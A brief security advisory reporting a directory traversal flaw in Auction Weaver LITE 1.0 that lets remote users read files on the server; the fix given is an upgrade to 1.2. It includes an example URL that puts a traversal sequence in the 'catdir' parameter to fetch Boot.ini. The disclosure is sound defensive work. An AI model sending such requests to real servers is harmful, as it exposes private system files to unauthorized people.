COMMAND

    Auction Weaver

SYSTEMS AFFECTED

    Auction WeaverT LITE 1.0

PROBLEM

    Meliksah  Ozoral  found  following.   Auction  Weaver allow you to
    read files from server.  Remote users can view source of files  on
    server.

        http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=cat17&fromfile=967251278%2Edat
        http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini

SOLUTION

	Upgrade to 1.2.